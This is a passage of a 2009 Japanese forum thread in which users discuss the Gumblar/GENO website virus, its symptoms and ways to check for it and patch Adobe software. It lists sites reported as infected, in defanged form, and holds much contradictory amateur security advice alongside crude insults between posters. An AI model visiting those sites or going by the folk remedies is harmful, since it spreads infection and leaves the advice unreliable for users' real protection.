ヒントお知らせ隊（http://hint.kobayashi.co.jp/）」「ハナノ
ア ブランドサイト（http://hint.kobayashi.co.jp/hananoa/
）」「イージーファイバー ブランドサイト（http://hint.kobayashi.co.jp/easyfiber/） 」の3つ。

　それぞれ、5月9日5時27分から5月11日21日27分までこれらのホーム
ページにアクセスした人は、ウィルスに感染した可能性があるとして、感
染の有無を確認するように呼びかけている。

　ウィルスに感染した場合、sqlsodbc.chmの改変、コマンドプロンプト
が起動不能、レジストリエディタが起動不能などの症状が発生するとしている。

　尚、同社ではMacとWindows Vistaに関してはこのウィルスには感染する恐れはないとも述べている。
　　　　　　　　　^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
http://www.technobahn.com/cgi-bin/news/read2?f=200905142239

>>495
ありがとうございます
>>496
おまえはビルゲイツのけつの穴でもなめてろ

>>502
なんかむかつく

>>502
死ねage厨

>>493
だめだ　どうでもいいﾌｧｲﾙ指定しても勝手にIEに飛んでしまう＼(^o^)／　せめてIEを使うことを警告してくれればいいのに　っていうかIEしかない件

MicrosoftのWindows Updateのサイトは大丈夫なのかねえ。
Windows Updateも命懸けででやらないと。と不安になってきた。

痛ニューとかハム速あたりで宣伝してくれねーかなあこのウィルス
これだけ被害増えてるのに認知度が低いどころか皆危機感がない

(　´_ゝ｀)ﾌｰﾝ

で済まされる

>>505
じゃあさーIEいっかいけして他のに対応させてまたIEいれたらいいじゃん

>>501は12日時点での情報だし亜種がMacやVistaを狙わないとは限らないわけで

>>507
NHKニュースでトップ扱いクラスなんだがな。
どこのマスコミも無視しやがるわ。

>>505
ファイル？
ちゃんとブラウザを指定してる？それこそ狐とか。

>>510
国家レベルのやつが感染したらニュースになるねー

>>505
プロキシ設定でどうやっても通らないやつを指定してみたらどう？

>>508
家族共用パソコンなんで親父のアカウント権限が無いと導入できない件　URLを見ると反射的にクリックする癖をいい加減直さんと

>>510
豚ちゃん優先なんだろね

>>512
それでは遅いんだがな、危機感がないのはいつものことか

家族に言っても誰も反応ねえ…
勝手にＰＧ2ぶちこむわけにいかないしとりあえず
あどべJavaSオフとフラッシュ最新にしといてあげればいいよね

そいやセカンドPCに入れてるAVGって ZlkonやGumblarに対応しとるんかな…

>>509
VistaはともかくMacなんて相手にもされてないからw

フラッシュプレイヤー最新版にしたいのに
インスコできない(´；ω；`)
activeX許可した途端にブラウザ真っ白になって固まる

>>514
もうどうしようもなくね！？
オヤジに頼むしかなくね？

>>518
既出なら対応
亜種新種はどのソフトも無理

>>1のサイトがいつなくなるかもわからないので、
現在感染中のサイトを転載しておく

p-frying■com/
www■zengozen■co■jp/
www■beauty-wed■co■jp/
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/

>>523
乙
こんなにあるのか

そろそろ手動で駆除する方法を考えようじゃないか

>>520
http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe

>>319
あるよ

コードギアススレに貼られていたんだが

>>522
�d
亜種の件もあるから、設定とか見直してくる！

>>514
そもそも、制限ユーザなら感染しなくね？

更新するやつが押しかけてサイト重くなってんじゃねーの

>>510
自分達が廃れ始めた原因の一つであるインターネットが、この件で少しは廃れてくれればとでも思ってるんじゃね？

>>501
詳しい情報ありがとうございます
>>519
おまえはパルマーのちんちんでもしゃぶってろ

ニュー速＋で記事にしてくんないかな

心配しすぎて寝れない

>>533
巣に帰れよ基地外

>>536
荒らしに構うなよ

>>530
mjk よくわからんが解説頼む

亜種がどんどん作られたらどうしようもなくなる

sodbc.chmのサイズって、どこみたらいいの？(XPの場合)

サイズ:1.29KB(1323バイト)
ディスク上のサイズ:4.00KB(4096バイト)

になってる。
ハッシュ値も違ってるし、どっちにしても感染確定だorz

cmdもregeditも立ち上がるから亜種なのかも…？
そしてちょっとPCの挙動がおかしい
スタートアップに入れてたソフトがいきなり消えたり…

>>540
>>459

Vistaもマックも目くそ鼻くそだろ

>>540
該当ファイルを右クリック→プロパティで見れないか？
それにしてもちょっと危ないなそれ
ソフト消えるとかは危険なにおい

readerアンインスコすればかなり感染率下がる？

>>540
タスクマネージャー見て増えたプロセスを右クリックで停止してcmd.exe使ってHDDからそのプロセスを消した後、システム復元かけてみたら？

>>540
>スタートアップに入れてたソフトがいきなり消えたり…

これはかなり疑わしい

こういうウィルス作る目的ってなんなんだろう

■現在、自作PC板ではアスペル（アスペルガー症候群）、
MACオタ、あっち糞、ダプオ（脱糞男）などの名で知られ、
AMD中傷を行っています。

・クレカ情報うまうま
・俺SUGEEE
・卒業制作

メモ

Firefox:
　noscriptを入れて信用できるサイト毎に許可してあげるのが無難

Opera9.xx:
　Operaは設定が少々ややこしいが、noscriptみたいなアドオンを入れなく
　ても似たような事ができる（以下参照）
　ウインドウ下部を右クリックしてカスタマイズを選ぶ
　ボタンタブに切り替える
　Java、JavaScript、Cookie、プラグイン、リファラなど好きな機能を選び
　ウインドウ下部にドラッグして置いていく
　これで好きなときに各機能をon/offしてWebを閲覧することができる（普
　段は全offにしておくことが望ましい）
　信頼できるサイト等、常に機能をonにしておきたいサイトはツール→クイ
　ック設定→サイト毎の設定でサイト毎に許可設定してあげればおｋ
　↑のサイト設定の管理（削除・変更等）はツール→詳細設定→コンテンツ
　でできる

w3m:
　w3m本体とw3mが使ってるcygwin関連のDLL (cygcrypt,cygiconv,cygintl,
　cygssl,cygwin1)を同じフォルダに放り込んでおけばcygwinをインスコし
　なくてもw3mを使える（一部制限あり）
　読み物主体のWebを閲覧するならこれで見るのが安全（マイナーだしｗ）
　ちなみに\Documents and Settings\User\.w3m\にw3mの設定ファイルが作
　られる
　ねこだいすき

豚インフル騒ぎよりも恐ろしく感じる自分

>>512
政府関連やマスコミ関連サイトで大々的に感染して
やっと動くってところだろうな

>>500
readerなくて感染した例

>>538
いまのところ、強制ダウンロードさせられたウィルスファイルをAdobeの穴経由で
実行させられて、sqlsodbc.chmの改変と%Root%に不正ファイルをおいてドライバ
登録させられるってのが感染メカニズムだから、強制ダウンロードされたのが
制限ユーザなら、それから先のメカニズムは制限ユーザには実行できない
はずなのさ。

>>552
朝日でも感染すればいいのに・・・

そんなに怖いならネットに接続しなきゃいい

>>552
それじゃあ遅いのにね〜
豚インフルも大変だとおもうけどこっちも報道して欲しいわ

>>513
すまん自己解決した IEではなくJane2chに設定したら飛ばずにアドレスの色が変わるだけで済んだ

前スレでAdobe Readerが勝手に起動したって書いたんだけど

・sqlsodbc.chmを改変 →一応ファイルサイズは50,727 bytes
・cmd.exe、regedit.exeが起動不能 →起動した
・一部のアンチウイルスソフトが更新不能 →ノートン2009は更新できてる
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト) →Windows Updateにアクセスできる
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集 →？
・Googleの検索結果を改竄(リンクを弄る) →怖くて飛べない
・explorer.exeや一部のブラウザが異常終了 →IE、firefox、operaは普通に終了できた
・Acrobatが勝手に起動 →★★★★★どのサイトかは覚えてないがAdobe Reader7.0が起動された★★★★★→Acrobat JavaScriptは切ってなかった
・PDFファイルやシステムファイルが増殖 →どこを確認すれば？
・CPU、メモリ使用率がUP →特に変化なし
・再起動時にBSOD →普通に再起動できた

ニフのオンラインスキャンもやってみたけど白でした
勝手にAdobe Readerが起動するのって検索結果に普通のpdfファイルが出てそれをクリックしたって事もあるんだよね？
どのサイトを見てた時なのか全然覚えてないのが何とも・・・

http://pc11.2ch.net/test/read.cgi/hack/1240581253/
あしたおっぱいバレー観に行くカナ 2171

対策をしてるとはいえお気に入りの所ががいつ感染してるかとおもうと…
正直豚よりこっちのが怖い
個人サイトではとりあえず宣伝してくれようとしてくれるみたいだけど
どこまで広がるもんかねえ

Adobe Reader入れてなくても感染するって
どこから？

Flashから

>>550
ねこだいすきｗｗ

自称玄人がいっぱいのスレw

色んなサイトがフラッシュつかってるから完全に消すことできないじゃないか

Adobe Reader消せば
とりあえず危険は半分

>>500
GENOとは無関係なんじゃね？
違うウィルスかも。

なんでadobeがいつも狙われてるの？

なんでもいいがIE8が安定しない

653 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 01:02:14
ウイルスごときでなんでここまで騒いでるのか分からん

658 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 01:12:07
>>653
ニートはネットがないと困るからだろw

ネット使わない仕事なんて今時あるの？

>>569
クソ高いソフトの値段に切れたとか

おまいら祭ですね

バックアップ取るくらいしか無いな
ｊｓ切ったら動画見れないしｗ

>>565
>>565
>>565
>>565
>>565

>>571
クレカ情報筒抜けやら
自分のサイトで感染者ふやされたら嫌だろ普通

感染したか調べようと思ってavastインストールしたんだけど
再起動かかったら起動しなくなったorz
ビープ音が鳴ってるんだけどこれってパソコン自体の問題？
それとも感染したってこと？
ちなみにこれは別のパソコンから書き込んでます。

Adobe Reader最新版てヴァージョンなに？

今後の展開によってはν速民の「ニコニコにアクセスした形跡のあるパソコンが完全にぶっ壊れるウイルスでもないかしら」という願いがある意味実現したともいえるｗ

>>550
今回のは信用できるサイト閲覧も感染する可能性があるので困ってしまう。

w3mの他にもっとマイナーなHTML2と言うのがある。
Windowsへ何も考えずとも普通にインストール出来る。
但し使い心地はw3mより激しく悪し。

>>579
9.1.1

糞みたいな質問スルーしろよ

　　　　　　　　　　 ,-=;,
　　　　　　　　　　｛__７!
　　　　　　　　　　〔_ラﾚ　　　　　　　　,､_,-‐y;
　　　　　　　　　　 `y"l　　　　　　　ｒｦﾚへｼ'"
　　　　　　　　　　　iﾄ-ﾍ、　　　　　 （_;フｲ　　　　　　　　　　　　 r;_/iﾚｿ
　　　　　　　　　　　 l　　'ヽ　　　　　 ﾙ　|| 　　　　　 　 　　 　 　 し ン′
　　　　　　　 　 　 　 ヽ 　 ヽ　　　　 ﾚ'　||!　　　　　　　　　　　 人_ﾌ
　　　　　　　　　　　　　V　　ヽ, 　 　| 　 |.|　ｒ‐-､=‐-、　　　 _/　/
　　　　　　　　　　　　　 ヽ　　 ヽ,　　ﾄ = }{i　ｙ=‐'~Y__ 〉　　／　/
　　　　　　　　　　　　　　 `i ､,　 ヽ,　}-　ﾙﾊjﾄ'`_ンﾄ∠-r' 　 ｼ´　←Vista
　　　　　　　　　　　　　　　 V　　　`;|　　 i∨ ￣~７　 ﾝ〈___／
　　　　　　　　　　　　　　　　Ｖ丶 　|　　　ﾘ >,　　　 （ _／ ,_
　　　　　　　　　　　　　　　　 ヾ　　{　　　ソ　ﾚ　 ﾝ ;_ﾝ'" ,r" rn ゞﾐヽ
　　　　　　　　　　　　　　　　　 ゝ、ゝ　=　〃ｿノ__／ 　 / y''J | ＼` ヽ
　　 rn,　　　 　　　　　　　　　　rfﾚ`ー-=-‐''~￣　 　／`7　 `、|　　ヽ-'ヽ
　 rJllル7　　　　　　　rnh; 　 l´ ´'ﾘ　 ,rn　　　　　／　ｒ'ﾝ＝=ﾄ､!__　　V　ヽ
　　〉__ソ　　　　　　 ヾヽ``iｊ'ｌ　〉　/､,ﾊjjj し'l mhﾚ' 　 /f,　|ﾘ<ﾚ7,,m〉　 |　　|
　　|　 {　　　rfjn　　 ,;'V　_ﾝ',/　//〉r>,､__//ﾘリ ﾄ　 〈　}'=‐'　ｿ 〉ﾄii,_／　　j

>>582
なんて不吉な数字なんだ

>>569
使ってる人が多ければそれだけ感染拡大するからじゃね？

ビープ音は長符と短符の組み合わせでエラーコードになってるから
どんな風に鳴ってるのか書いたら誰か教えてくれるよ
あとBIOSも

パソコンド素人なんだけど
Adobe readerとフラッシュリーダー最新にアップデートと
ジャバスクオフが対策ってかかれてたから
リーダーの9.1インストールしてきたんだけど
もしかしてリーダーもフラッシュもインストールしないほうがいいの？
両方ない場合pdfとフラッシュ何で再生してんだろ…

必要なら入れるしかないだろ

参考になるかどうか分からんけど

メインノート　Vista Home Premium SP1 CPU　Centurino Duo メモリ１G→2G積み替え
　　　　　　　　Updateは NET Fｒameｗork3.5 / IE8　以外のオプションも含めて最新
　　　　　　　　Acrobat Reader /　Flash Player 最新

FW　OutPost Free + Windows FW （Comodo は相性悪くて断念、Online Armourはインスコしたことないのでコメント出来ず）

常駐　Avast!、AntiVir、AVG、A-Squared（去年キャンペーンで貰った一年有償版）、Windows Defender
　　　　（競合は今のところなし　ただAntiVirは キャンペーンで貰ったキーでPremium をインスコ直後に不具合発生、Freeに戻す
　　　　　※avasｔ！のWeb Guardが原因？　切って入れ直すか検討中）
http://www.dotup.org/uploda/www.dotup.org31610.jpg

非常駐　Bitdefender cmd版 SuperAntiSpyware Ad-Aware AE（常駐 オフ） SpywareBlaseter　Spybot（Tea-timerオフ）
　　　　　その他 Rootkit削除系ソフトもろもろ
ルータ　Zilkon GumblarのURLはじく設定 （10個しか入れられないので危険度が高い 78〜/94〜/213〜をメインに登録）＋ヤバいポート塞ぐ

Hostｓ や A-Squared に危険サイト名を登録済

Firefox + Adblock Plus + No Script　+ Flash Killer （Adblock Plus に危険URL登録済）　
念のためOpera Turbo と　Google Chromeもインスコ

以下明日以降やるつもり／検討中

OutPost を PC Tools に切り替えるか否か／PeerGuardian (Vista対応 Ver.)の導入
PARAGONでCとDドﾗｲﾌﾞをイメージディスク化→外付HDDに保存／7月末に切れるA-Squredに代わって ThreatFire 導入
「AirG PC監視」　「フォルダ監視」（共にソフト名）、対キーロガーソフトの導入

サブノートのXP HOME SP3 celeron / 768M は　AｎtiVir Premium（最近キャンペーンで貰った半年有償版）
+ ZoneAlarm Pro　（去年キャンペーンで貰った一年有償版）の点以外は大体Vistaと同じ

>>547
カネと自尊心

>>587
ありがとうございます。
ビープ音はピーピーピーピーと4連続、これをずっと繰り返してます。
画面は真っ暗で何も起動しません。

>>588
フラッシュはインストールしなきゃ見れないよ
PDFも何かしらの閲覧ソフトがなきゃだめ
どれが安全というのは結局古かったら意味がないから
あんまりないとおもう

最近やたらとパソコン重いんだよな…大丈夫かな
今外出先で確認できんorz

カスペで何か出てきた…
スキャン終わるの怖い

>>547
ビジネスだね
ゾンビ化させてネットワーク作ってそれごとマーケットで
売られてたりするよ

チキン野郎ばっかり

>>592
BIOSなに？

なるほど
あっちの板から誘導するとこんなのが湧くわけか・・・

早めに報道されりゃ感染するパソコンも少なくなるだろうに

vistaにしよう
Silverlightにしよう

小林製薬覗いたから＼(^o^)／
とおもったけどｾﾌだったこえぇよー

>>593
なるほど
無知なうえノートン先生くらいしかないのに
よく感染してなかったな…

>>598
BIOSってパソコン起動しなくても調べられますか？
ぐぐってみたんですが
パソコンを起動してからの調べ方しか見つからなかったです。
初心者な質問で申し訳ありません。

酷い有様になってきてるね。
インフルエンザと一緒で初期対応を誤ると
あっという間に拡散して取り返しが付かなくなる良い例だ
GENOがもう少しまともな対応をしていれば
まだマシだったろうがもう手遅れ

>>597
豚乙

>>604
ttp://www.s124.net/errorcode/beepcode_award.html
ttp://www.s124.net/errorcode/beepcode_ami.html
自分でコード表見た方が早いんじゃね
音は書き込めないしｗ

>>605
キャッシュ消して発言がもうアレすぎ

セキュ板とはとても思えんスレだなぁ

>>608
まるで豚インフルが確認された時のメキシコの対応のようだｗ

　　　　　　　　　 ／） 　　　　　　　　　　　　
　　　　　　　　　　　／／／） 　　　　　
　　　　　　　　　 ／,.=ﾞ''"／ 　　　　　　　　　　
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　キャッシュ消しゃーいいんだよ！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

>>604
筐体を開けてマザーボードを見ると
AwardとかAmiとかphoenixとか書かれているシーツつきROMがある。
ただしノートだと筐体開けると保障が聞かなくなる場合がある

環境作ったけど、テストするURLがわからん！

もしGENOに感染してれば、>>578さんがAdobe reader を介さないで感染した
初の表出例になるのかな。

今電源入れてみたら起動しました！
avastが今ウィルスチェックしてるのでそれが終わって
このウィルスのようだったら書き込みます。お騒がせしてすみませんでした。

ここIDねーのか・・・

　　　　　　　　　　　　　　　　　　　　　　　　', ;l: ll kr'´　ィイｨ彳彳彳彳
　　　　　　　　　　　　　　　　　　　　　　　　 ヾ州ィイｲｨ彳彳彡彡彡
　　　　　　　　　　　　　　　_ ＿＿　　　　　　,′　　　　　　　　｀`ヾミミﾐ
　　　　　　　　　　　 ,.　'´;:.:.:.:.::::::::.:.:.｀`ヽ　　,′　　　　　-‐ミﾐヽ/ミミﾐﾐﾐ
　　　　　　　　　,.　'´..:.:.:,.　-─‐‐- ､;;;:;:.:ヽ〈　　　　　　　　　 　,′ミミﾐﾐヽ
　　　 　 　　 ／ .:.:.:.:.:.く　　　　　　　 ｀`ヾ「ヽヽヾミﾆ二二ミヽ　｀ヾミミﾐ
　　 　　 　./　.:.:.:.:::::::::::::〉　　∠二二ﾆ彡' V/ T TTにﾆﾆﾆﾆﾆﾆﾆﾆﾆ====
　　 　 　 / .:.:.:.:::::::::::::::/ 　　　　-＝'ぐ 　/　　 l　||¨´￣｀`　　　　　　　. :;
　　　　 / .:.:.:.::::::::::::::::/　 　　　'''´￣｀　/　　　｀Y´　　　　　　　　　　　. ;..:　　　　
　　　　,′.:.:.:.:::::::::::::〈　　　　　　　　　　ヽ__＿_ノ',　　　　　　　　　　　.;: .;:
　　　　i .:.:.::::::::::::::::::::::',　　　　　　　　　,;;;'ﾊミミﾐヽヽ　　　　　　　　.,.:; .; :.;:.
　 　 　 ',.:.:.:.:/´￣｀ヽ;;;',　　　　　　　　.;;;'　 ｀`ヾﾐヽ　j!　　　　　,. ′.;: .;:. :
　　　　　',.:.:.:ヽ　い(　ミj!　　　　　　　　　　　　 　）ﾐﾐj ､ ､　', .,　､:, ､　.; :.
　　　　　 ',;;;:;:;:入　　　　＿　　　　　　　..:;.;:.:;..:｀Y　ﾐj!　 ､ ､　', .,　､:, ､
　　　　　　';;;:;:.:　 ｀フ´　　_ﾉ　　　　. ;: .;: .; :. ;:. ;:.｀Y´　 ､ ､　', .,　､:, ,.　'´
　　　　　　 Lノ´￣ 　, ィ´　　.:; .:; . ;:. ;:. ;: .;: .; :. ;:. ;} ､ ､　', .,　､:,,.: '´
　　　　　　ﾉノ　　　___＿＼　;.: .;: . :;. :;. :;. :; .;: .;: .;人 _; :; :; ィ´`ヾ
　　　,.　 '´　　　　　　　　￣￣｀`¨¨ー',:;;,,:,;:,;,. '´ /;;;;;;;;;;;;;;;/　　　',

>>21
avastはヒューリスティック最大にしておかないとダメなんじゃなかったっけ
デフォルト設定だと普通に感染するでしょ？

うちのPC起動すると「ピッ」てビープ音する

>>615
感染してないことを祈るよ
もしadobe readerなしで感染してたらorz

>>618
>>21はテンプレ作成前の先走り汁ですね。
>>24とペアで参照のこと。

4回連続で鳴るって言ってるから
起動のときの音とは違うだろ

入れてるウィルスソフトアンインストールしてavast入れた方がいい？
共存はまずいんだよね？NOD32なんだが

メモリかなんかにホコリ溜まってるとか
なんかパーツが抜けかけてるとかじゃねーの

>>623
とりあえずそれ以外でできる最善の方法とってれば今の所は大丈夫そう

>>613
>>523

完全な予防ってVista以外じゃ出来ないのか…
こええなあ…

ttp://up2.pandoravote.net/img/pandora00031166.jpg

adobe readerの更新ページ死んでるんだけど？

VistaでもUAC切ってればだめんしょ？

●個人情報お祭り中●
docomo 2009夏モデル Part22
http://anchorage.2ch.net/test/read.cgi/keitai/1242369764/

Adobe Reader/Acrobatの脆弱性対策を考える
ttp://internet.watch.impress.co.jp/cda/special/2009/05/15/23451.html

>>629
マジ？

勝手に改竄されるソースってどういうのかわかる？

リアルでも渡航歴のない人間が豚インフルに感染濃厚だって・・・

怖くてもう寝れねーーーーーーーーー

>>635
さっきテレビのニュース速報やってた

もう怖くてネットサーフィンできねぇ
しばらく専ブラ使って２ちゃんだけの生活にするか

Windowsなんか捨ててMacにしろ、な

ネットもお外も大変な事になってますな

GENOの鯖ってMacで感染したんじゃなかったっけ

Adobeはどうしようもないな

ネットゲームに関してはどうなのこれ

Macはウィルスに感染しないし
使い勝手もいい、それに目にもやさしいし
使いつづければ筋力もつく、最高だよ

同人スレみてきたけどこれもう相当数のサイトが感染してそうだな
1000じゃきかないか
グーグル使えねえよちきしょー

アドビｽﾚ

Site Area Temporarily Unavailable

> システムメインテナンスのため本サービスを一時停止しております。ご利用の皆様には
> ご不便をおかけして大変申し訳ございません。メインテナンス作業が終り次第、
> サービスを開始できるよう準備を進めておりますので、今しばらくお待ち下さいますよう
> お願いいたします。

http://get.adobe.com/jp/flashplayer/

vistaと7は大丈夫って聞いたけどそれは確定なの？
なんか三日前からパソコンくそ重いんだが…
守ってんのノートン先生だし不安すぎる

逃げたなアドビ

２ちゃんをjaneでやる分には問題ないよな・・・
詳しくないし万が一感染したら初期化とかめんどいし

静かになるまではネットは必要以上に使わないようにするか

>>644
恋人も出来るしな

いや恋人はできん

フラッシュとリーダーをアンインスコしたら平和にならね？

adoveが現行の9.1じゃなくて9のまんまなら大丈夫かね？
一応javaは切ったが

9.1がヤバイの？
古い方がいいの？

まるで初心者の駆け込み所

この脆弱性は、
Adobe ReaderおよびAdobe Acrobatの
現行バージョンであるバージョン9.1および
8.1.4と、
旧バージョン（7.1.1以前）に影響があり、
Windows版、Mac版、Linux版の
すべてが影響を受けるとしている

すこしはテンプレから嫁ｗ

>>491
OSX10.4.11でact2の最新版のインターネットセキュリティバリアX5バックアップエディション使ってるけど
二週間ほど前にトロイの亜種に感染した。こんなの初めてだよまったく。
バックグラウンドから攻めてくるからウイルスバリアのログはまめにチェックした方がいい
あとsafari起動時にdockにエイリアスが立ち上がっては消え立ち上がっては消えと挙動不審になったり
偽装ソフトウエアアップデートの表示が現れ再起動してくださいと出るけど絶対再起動しちゃダメ。

本スレだからこっちで聞けとか言って
色々貼られてるししかたない

>>658
Acrobat Readerは？

あと半年もすれば賢い人らがどうにかしてくれぞガハハ

9.0ってどこで落とせるの？

91いれてからうｐでーとで911にしろ

ちょ、スレ加速しすぎ
感染サイトが一気に増えて、被害者も急に増えたのか?

感染サイトを検索サイトで上位に来るように細工をする
感染サイトが正常であるかのごとく、検索サイトに表示されるように細工する
ってのがちょっと面白いな
サイト管理者としては、バレない・バックレ可能なら放置した方がメリットあるわけで。

被害者面して逆切れしてくる奴がいる以上、2chで晒して行くのが対抗策の一つかな

とりあえず下の１〜３の手順を意味を理解しなくていいから実行するといいよ。

１．ウィンドウズキー（Windowsのマークのあるキー）を押しながらRキー　を押す
２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　→背景が黒いウィンドウが開いた場合３へ
　→起動しない場合：感染疑い濃厚

３．背景が黒いウィンドウを選択。
　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

　　1個のファイル　50,727バイト　と表示されればOK

なんかわかりやすかったから転載しておくね

肝心のうｐデートのサイトが死んでるけどな

同人板でコピペまわってたからそれでここに辿り付いた
スレが加速したのはそのせいかと

一応感染してないみたいだけど、２ちゃんは開いてても大丈夫なの？
ニコとかpixivやばいなって書き込みあったけどしばらくは見ない方がいいんだろうか…

sqlsodbc.chmを見たら1323バイトなんだが感染してるのか…？
更新日時は2007年4月17日なんだけど

ttp://get.adobe.com/jp/reader/
ttp://get.adobe.com/jp/flashplayer/

入れたらReaderはjavascriptを切るのじゃぞ

質悪いのに隠蔽ばっかで騒動にならないし、
むしろこの調子でガンガン初心者にも知識付いた方がいいだろう

もうね危ないからIEをアンインストールしたよ。
これで安心してネットができ……アレ？

>>672
入れてない奴はそもそも入れる必要ねぇだろ
入れてなきゃ大丈夫なんだし

神戸市民だけど何がなんだか

reader8.1.3だったんだが
これはセフセフか？

アップデートはどこですんの？

HTMLに挿入されるjavascriptってどんなのかわかる？
どういうのがあやしい記述なのかわからん

reader6.0.?だったけどうｐデート出来ねえからアンインスコした

ttp://www.kaspersky.com/virusscanner
でフルスキャンしてみれ

【レス抽出】
対象スレ：GENOウイルススレ　★4
キーワード：？

抽出レス数：164

ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
嫁

>>671
自分も同じだ
cmd立ち上がらないし多分感染してる

>>679
それが気になる

別に同人サイトとか見てないし見る予定もないけどなんか怖いな
ひと段落するまではネサフやめるか

>>677
どう見てもold verです

>>671
>>684
アウト

同人ってちんこうｐろだ？

同人サイトってなんなの？
どういうサイトのこと？

>>686
一般サイトも感染してんだろ？

Flashの最新って何？更新サイトつながらなくね？

>>688
うっは俺も＼(^o^)／ｵﾜﾀ

同人スレより

335 名前：GENO[sage] 投稿日：2009/05/16(土) 02:10:10 ID:pp5Zm/yY0
>>303
感染しているサイトをSourceCheckerOn-lineでチェックしてみると、ほれ、この通り。

so.7walker.net/?site=hうtんtこp://asagaya-drum.com/

難読化されたJavaScriptが<BODY>の前に埋め込まれているのが分かるよね？


同人スレでは「うんこ」が抜けてたため踏んだ人多数
(すでにウィルスは駆除済みらしいが)

>>692 ttp://www.adobe.com/jp/software/flash/about/

俺もつながらねー
とりあえずavastならおｋ？

>>679,685
こういうの
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1225887517?fr=shopping_search

とりあえず下の１〜３の手順を意味を理解しなくていいから実行するといいよ。

１．ウィンドウズキー（Windowsのマークのあるキー）を押しながらRキー　を押す
２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　→背景が黒いウィンドウが開いた場合３へ
　→起動しない場合：感染疑い濃厚

３．背景が黒いウィンドウを選択。
　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

　　1個のファイル　50,727バイト　と表示されればOK

なんかわかりやすかったから転載しておくね


之テンプレに入れようか？

>>696
このスレ最初から読めよ

adobe復活まだかYO

すいません　Ａｄｏｂｅｒｅａｄｅｒ9.1.0しか見つからないんですけど
9.1.1ってどこにありますか？

同人スレより転載

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認

>>696
Avast!は検体提出するボランティアが優秀なのか
GENOウイルスに関しては対応が最速クラスだね

>>701
よく読めよ9.1に脆弱性があったんだろ
で、それを9.1.1にする必要があるわけだろ
だから、9.1にわざわざする必要はない
しかもアップデートは今落ちてんだろ

>>701
9.1.0をインストール
ヘルプ→アップデートの有無をチェック→9.1.1にアップデート

>>701 readerを起動してヘルプからアップデートの有無をチェックするのじゃ

>>697
怖くて踏めねえｗ

>>686
>>12
同人サイトなんかお話にならないほどの大手企業サイトが被害にあう＆被害を広めてる

>>708
了解
しばらく控えるわ

インストールしたら英語盤でしたorz
ヘルプのところにアップデートチェックってのがあるんですけどこれですか？

adobeの他のプログラムは大丈夫なん？
プログラムの追加と削除にこんだけあるんだが…(Readerは削除)
Adobe AIR
Adobe Downlode Managar 1.2（削除のみ）
Adobe Flash Player 10 Active
Adobe Flash Player 10 Plugin
Adobe photoshop Album 2.0 mini
Adobe Shockwave Player 11.5
Adobe SVG Viewer 3.0

面倒くせぇから7も8もさっさと9.1にしてバージョンアップ作業すれ

カペルスキーのオンラインスキャンページが強制終了する

710は私じゃないです
アップデートできました
ありがとう

ウイルスに改変されるとサイトのソースはどんなふうに変わるんだ
JSのコードさらしてくれ

アクロバットリーダーの５使ってるんだけど
一気に9.11までアップデートできないのこれ？

>>710も>>714も俺じゃないんだけど・・・・
>>706
9.1.1にアップデートできました　超サンクス

メルマガ送ってくるんだけど
ＧＥＮＯにまだウイルスいるの？

初心者スレにでもいけよ

>>713 それ多分javaのバージョンが古いんじゃねーかなー？？
トレンドマイクロとか試してみ
ttp://www.trendflexsecurity.jp/security_solutions/housecall_free_scan.php
しまんてっく
ttp://www.symantec.com/region/jp/securitycheck/index.html

>>697はYahoo知恵袋ですよ
問題はその中身
正確に状況を把握できてる人間が1人だけ・・・

sqlsodbc.chmってどこのフォルダ？

>>523
こんな如何にも普通の一般サイトが感染してんのかｗｗｗ

もう何処も怖くてアクセスできねぇｗ

>>722
検索しろ

>>722 c:\windows\system32\

なんで急にこんなになだれ込んできたんだ？
同人から来たのか？

>>722
つ 検索

>>724
